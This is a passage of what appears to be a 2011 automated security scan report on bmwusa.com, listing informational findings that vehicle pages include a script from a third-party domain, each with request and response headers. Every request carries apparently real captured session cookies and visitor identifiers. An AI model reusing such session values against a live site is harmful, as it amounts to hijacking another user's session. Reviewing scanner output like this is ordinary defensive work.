Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:07:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:27:21 GMT;path=/
Content-Length: 227187


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.171. http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/features_and_specs/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/740isedan/features_and_specs/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/740isedan/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:06:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:26:47 GMT;path=/
Content-Length: 227188


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.172. http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/740isedan/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/740isedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:06:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:26:35 GMT;path=/
Content-Length: 215341


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.173. http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/modelhighlights/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/740isedan/modelhighlights/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/740isedan/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:06:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:26:30 GMT;path=/
Content-Length: 215342


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.174. http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/7seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/740lisedan/7seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/740lisedan/7seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:10:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:30:29 GMT;path=/
Content-Length: 202193


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.175. http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/740lisedan/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/740lisedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:11:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:31:18 GMT;path=/
Content-Length: 212920


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.176. http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/740lisedan/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/740lisedan/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:09:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:29:48 GMT;path=/
Content-Length: 212921


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.177. http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/740lisedan/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/740lisedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:11:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:31:09 GMT;path=/
Content-Length: 227711


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.178. http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/features_and_specs/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/740lisedan/features_and_specs/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/740lisedan/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:10:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:30:32 GMT;path=/
Content-Length: 227712


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.179. http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/740lisedan/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/740lisedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:10:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:30:09 GMT;path=/
Content-Length: 215455


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.180. http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/modelhighlights/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/740lisedan/modelhighlights/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/740lisedan/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:10:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:30:08 GMT;path=/
Content-Length: 215456


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.181. http://www.bmwusa.com/standard/content/vehicles/2011/7/750isedan/7seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750isedan/7seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/750isedan/7seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:14:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:34:33 GMT;path=/
Content-Length: 202156


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.182. http://www.bmwusa.com/standard/content/vehicles/2011/7/750isedan/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750isedan/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/750isedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:12:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:32:03 GMT;path=/
Content-Length: 212689


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.183. http://www.bmwusa.com/standard/content/vehicles/2011/7/750isedan/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750isedan/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/750isedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:14:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:34:37 GMT;path=/
Content-Length: 228030


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.184. http://www.bmwusa.com/standard/content/vehicles/2011/7/750isedan/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750isedan/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/750isedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
